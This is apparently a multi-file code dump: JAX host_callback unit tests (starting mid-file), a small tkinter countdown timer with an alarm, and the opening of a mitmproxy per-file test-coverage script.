result_shape=(jax.ShapeDtypeStruct(result_shape_0, np.float32),
jax.ShapeDtypeStruct((1,), np.float32),
jax.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(jax.ShapeDtypeStruct(result_shape, np.float32),
jax.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, jax.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = jax.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=jax.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = jax.pmap(fun)(xv)
self.assertAllClose(jax.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
jax.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.Mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
    """An exception raised inside the host callback is reported back."""
    def raising_host_fn(x):
        raise ValueError("user exception")

    def device_fun(x):
        return hcb.call(raising_host_fn, x, result_shape=x)

    self.helper_check_callback_errors(
        lambda: device_fun(3.), "ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
    """A callback whose result pytree mismatches result_shape must error."""
    def device_fun(x):
        # Host function returns a pair although a single array was declared.
        return hcb.call(lambda v: (v, v), x, result_shape=x)

    self.helper_check_callback_errors(
        lambda: device_fun(3.),
        "Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
    """Device computation keeps going after a failing outside call."""
    def raising_host_fn(x):
        raise ValueError("user exception")

    def device_fun(x):
        return hcb.call(raising_host_fn, x, result_shape=x)

    arg = np.arange(3, dtype=np.int32)
    self.helper_check_callback_errors(
        lambda: self.assertAllClose(arg, device_fun(arg)),
        "ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
    """Calls a JAX function on a specific device with simple support for reverse AD.

    Functions whose name starts with "jax_outside" are called on another device,
    by way of hcb.call. Reverse-mode AD is supported via a custom_vjp whose
    backward rule recursively routes the VJP computation through this same
    mechanism, which also enables higher-order differentiation.
    """
    def run_jax_outside_fun(arg):
        # Executed on the host: place the argument on `device` and run jitted.
        return jax.jit(jax_outside_fun)(jax.device_put(arg, device))

    @jax.custom_vjp
    def make_call(arg):
        # result_shape is computed abstractly so no real execution is needed
        # to declare the output structure of the outside call.
        return hcb.call(run_jax_outside_fun, arg,
                        result_shape=jax.eval_shape(jax_outside_fun, arg))

    # Define the fwd and bwd custom_vjp functions
    def make_call_vjp_fwd(arg):
        # Return the primal argument as the residual. Use `make_call` for the
        # primal computation to enable higher-order AD.
        return make_call(arg), arg

    def make_call_vjp_bwd(res, ct_res):
        arg = res  # residual is the primal argument

        def jax_outside_vjp_fun(arg_and_ct):
            # Runs on the outside device: rebuild the VJP and apply it.
            arg, ct = arg_and_ct
            _, f_vjp = jax.vjp(jax_outside_fun, arg)
            ct_in, = f_vjp(ct)
            return ct_in

        # Recurse so the cotangent computation is itself an outside call.
        return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)

    make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
    return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
    """Tests using `call_jax_other_device`."""

    def setUp(self):
        # host_callback is broken on multi-GPU platforms (issue #6447).
        if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
            raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
        # Pick an "outside" device distinct from the device under test:
        # the first CPU when testing on an accelerator, else a second CPU.
        if jtu.device_under_test() != "cpu":
            assert jax.devices("cpu")
            self.outside_device = jax.devices("cpu")[0]
        else:
            if len(jax.devices("cpu")) == 1:
                raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
            self.outside_device = jax.devices("cpu")[1]
        super().setUp()

    def test_jax_impl(self):
        # Outside call must match the direct computation, eager and jitted.
        def f_jax(x):
            return jnp.sin(x)

        def f_outside(x):
            return call_jax_other_device(f_jax, x, device=self.outside_device)

        self.assertAllClose(f_jax(3.), f_outside(3.))
        self.assertAllClose(f_jax(3.), jax.jit(f_outside)(3.))

    def test_jax_impl_pytree(self):
        def f_jax(x):
            # x : dict(a=..., b=...) and output is a list of two elements
            return [jnp.sin(x["a"]), jnp.sin(x["b"])]

        def f_outside(x):
            return call_jax_other_device(f_jax, x, device=self.outside_device)

        x = dict(a=3., b=4.)
        res_jax = f_jax(x)
        # print(f"outside_jaxpr = {jax.make_jaxpr(f_outside)(x)}")
        res_outside = f_outside(x)
        self.assertAllClose(res_jax, res_outside)

    def test_jax_grad(self):
        # Reverse-mode AD must flow through the outside call (custom_vjp).
        def f_jax(x):
            return 2. * jnp.sin(x)

        def f_outside(x):
            return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)

        res_jax = jax.grad(f_jax)(3.)
        self.assertAllClose(res_jax, jax.grad(f_outside)(3.))

    def test_jax_grad_pytree(self):
        def f_jax(x):
            # x : dict(a=..., b=...) and output is a float
            return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])

        def f_outside(x):
            return call_jax_other_device(f_jax, x, device=self.outside_device)

        x = dict(a=3., b=4.)
        res_jax = jax.grad(f_jax)(x)
        self.assertAllClose(res_jax, jax.grad(f_outside)(x))

    def test_jax_grad_of_grad(self):
        # Second-order AD: the bwd rule itself goes through an outside call.
        def f_jax(x):
            return 2. * x * x * x

        def f_outside(x):
            return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)

        res_jax = jax.grad(jax.grad(f_jax))(5.)
        res_outside = jax.grad(jax.grad(f_outside))(5.)
        self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
    # host_callback is broken on multi-GPU platforms (issue #6447); skip there.
    if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
        raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
    super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
                  has_input_token=True, has_output_token=True):
    """Check that the rewrite of func(*args) matches expected.

    NOTE: the string comparison below is deliberately disabled, so this
    currently only verifies that the outfeed rewrite runs without error;
    `expected` is kept as documentation of the anticipated jaxpr.
    """
    jaxpr = jax.make_jaxpr(func)(*args)
    rewritten = hcb._rewrite_closed_jaxpr(jaxpr,  # noqa: F841
                                          has_input_token, has_output_token)
    # Since it is somewhat annoying to update the Jaxpr assertions when we change
    # the Jaxpr printing, we do not check these by default. It is recommended that
    # before making changes to the code generation and Jaxpr rewriting, turn on
    # the checking, update the expected Jaxpr, and then make the changes.
    # assertMultiLineStrippedEqual(self, expected, str(rewritten))
    del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, jax.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
jax.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
app_timer.py | import tkinter
import playsound
import threading
from tkinter.constants import DISABLED, NORMAL
class AppEntry:
    """Pair of tkinter Entry widgets (minutes / seconds) limited to 2 chars.

    The entries are backed by StringVars; a write-trace re-validates the
    length on every keystroke.
    """

    def __init__(self, root):
        # Defaults display a one-minute timer ("01:00").
        self.st_min = tkinter.StringVar(value="01")
        self.st_sec = tkinter.StringVar(value="00")
        self.ent_min = tkinter.Entry(root, textvariable=self.st_min)
        self.ent_sec = tkinter.Entry(root, textvariable=self.st_sec)
        self.ent_min.config(width=10)
        self.ent_sec.config(width=10)
        # Re-check the length whenever either variable is written.
        # NOTE(review): trace("w") is the deprecated alias of
        # trace_add("write") — consider migrating.
        self.st_min.trace("w", lambda *args: self.max_chars())
        self.st_sec.trace("w", lambda *args: self.max_chars())

    def max_chars(self):
        # When a third character is typed, the field is reset to only the
        # last character typed. NOTE(review): presumably an intentional
        # "start over" behavior; `[-2:]` would instead keep the last two
        # digits — confirm the intent.
        if len(self.st_min.get()) > 2:
            self.st_min.set(self.st_min.get()[-1])
        elif len(self.st_sec.get()) > 2:
            self.st_sec.set(self.st_sec.get()[-1])
class AppTimer:
    """Countdown timer driven by Tk's after() scheduler.

    State machine in self.on:
        0 - idle (or alarm ringing),
        1 - counting down,
        2 - stop requested; the next tick returns to idle.
    """

    def __init__(self, root, frame):
        self.min = 0        # remaining minutes
        self.sec = 0        # remaining seconds
        self.on = 0         # state: 0 idle / 1 running / 2 stop requested
        self.sound = False  # True while the alarm loop should keep playing
        self.ent = AppEntry(frame)
        self.b_start = tkinter.Button(frame, text="start", fg="black", bd=3, command=self.timer)
        self.b_reset = tkinter.Button(frame, text="stop", fg="black", bd=3, command=self.reset)
        self.lbl = tkinter.Label(frame, text="00:00", font=("", 30))
        self.err = tkinter.Label(frame, text="")

    def reset(self):
        """Request a running countdown to stop and silence the alarm.

        self.sound is cleared unconditionally: when the countdown has
        finished, self.on is already 0 while the alarm thread loops on
        self.sound, so the alarm must be stoppable from the idle state too.
        """
        if self.on != 0:
            self.on = 2
        self.sound = False

    def check_in_err(self, min, sec):
        """Return 0 if both values are valid clock components (0-59), else -1."""
        if min > 59 or sec > 59:
            return -1
        if min < 0 or sec < 0:
            return -1
        return 0

    def in_user(self):
        """Read and validate the entry fields.

        Returns 0 on success (or when a countdown is already running),
        -1 on empty/non-numeric/out-of-range input.
        """
        if self.on == 1:
            return 0  # already counting down; keep current values
        min = self.ent.ent_min.get()
        sec = self.ent.ent_sec.get()
        if len(min) == 0 or len(sec) == 0:
            return -1
        if not min.isdigit() or not sec.isdigit():
            return -1
        min = int(min)
        sec = int(sec)
        if self.check_in_err(min, sec) != 0:
            self.err.config(text="minutes and seconds should be in 0-59")
            return -1
        self.err.config(text="")  # clear any stale error message
        self.min = min
        self.sec = sec
        self.on = 1
        return 0

    def text_format(self, min, sec):
        """Format the remaining time as zero-padded "MM:SS"."""
        st = "0{0}:".format(min) if min < 10 else "{0}:".format(min)
        st += "0{0}".format(sec) if sec < 10 else "{0}".format(sec)
        return st

    def alarm_on(self):
        """Play the alarm repeatedly until reset() clears self.sound.

        Runs on a worker thread; re-enables the start button when done.
        """
        while self.sound:
            playsound.playsound("libs/Alarm-clock-bell-ringing-sound-effect.mp3")
        self.b_start["state"] = NORMAL

    def timer(self):
        """One countdown tick; re-schedules itself via lbl.after()."""
        if self.on == 2:
            # Stop was requested: return to idle and re-enable start.
            self.on = 0
            self.b_start["state"] = NORMAL
            return 1
        if self.in_user() != 0:
            return -1
        self.b_start["state"] = DISABLED
        self.lbl.config(text=self.text_format(self.min, self.sec))
        if self.min != -1 and self.on == 1:
            if self.sec == 0:
                # Borrow a minute; min reaching -1 marks the countdown's end.
                self.min -= 1
                self.sec = 59
            else:
                self.sec -= 1
            self.lbl.after(1000, self.timer)
        else:
            # Countdown finished: reset display and ring until stopped.
            self.on = 0
            self.sound = True
            self.lbl.config(text="00:00")
            th = threading.Thread(target=self.alarm_on)
            th.start()
        return 0
|
individual_coverage.py | #!/usr/bin/env python3
import io
import contextlib
import os
import sys
import glob
import multiprocessing
import configparser
import itertools
import pytest
def run_tests(src, test, fail):
    """Run pytest for one source/test pair, enforcing 100% coverage of src.

    Exits the current process with pytest's exit code (0 on success).
    Exit code 42 flags a file that passed although listed as excluded.
    Intended to run inside a child process (see start_pytest).
    """
    stderr = io.StringIO()
    stdout = io.StringIO()
    with contextlib.redirect_stderr(stderr):
        with contextlib.redirect_stdout(stdout):
            e = pytest.main([
                '-qq',
                '--disable-pytest-warnings',
                '--no-faulthandler',
                '--cov', src.replace('.py', '').replace('/', '.'),
                '--cov-fail-under', '100',
                '--cov-report', 'term-missing:skip-covered',
                test
            ])
    if e == 0:
        if fail:
            print("UNEXPECTED SUCCESS:", src, "Please remove this file from setup.cfg tool:individual_coverage/exclude.")
            e = 42
        else:
            print("SUCCESS: ", src)
    else:
        if fail:
            print("IGNORING FAIL: ", src)
            e = 0
        else:
            # Show only the coverage summary line for this file if present.
            cov = [line for line in stdout.getvalue().split("\n")
                   if (src in line) or ("was never imported" in line)]
            if len(cov) == 1:
                print("FAIL: ", cov[0])
            else:
                # BUG FIX: stdout.getvalue() used to be printed twice on this
                # line; print the header once, then stderr and stdout each once.
                print("FAIL: ", src, test)
                print(stderr.getvalue())
                print(stdout.getvalue())
    sys.exit(e)
def start_pytest(src, test, fail):
    """Run run_tests() in a fresh process.

    A new process is used so that imports and coverage state cannot leak
    between per-file runs.
    """
    worker = multiprocessing.Process(target=run_tests, args=(src, test, fail))
    worker.start()
    worker.join()
    return src, test, worker.exitcode
def main():
    """Pair every eligible source file with its test and run each through
    start_pytest; exit 1 if any per-file run failed.

    The exclusion list comes from setup.cfg [tool:individual_coverage].
    """
    c = configparser.ConfigParser()
    c.read('setup.cfg')
    fs = c['tool:individual_coverage']['exclude'].strip().split('\n')
    no_individual_cov = [f.strip() for f in fs]
    # Directories that never get individual-coverage enforcement.
    excluded = ['mitmproxy/contrib/', 'mitmproxy/test/', 'mitmproxy/tools/', 'mitmproxy/platform/']
    src_files = glob.glob('mitmproxy/**/*.py', recursive=True) + glob.glob('pathod/**/*.py', recursive=True)
    src_files = [f for f in src_files if os.path.basename(f) != '__init__.py']
    src_files = [f for f in src_files if not any(os.path.normpath(p) in f for p in excluded)]
    ps = []
    for src in sorted(src_files):
        # Mirror the source path under test/, prefixing the filename.
        test = os.path.join("test", os.path.dirname(src), "test_" + os.path.basename(src))
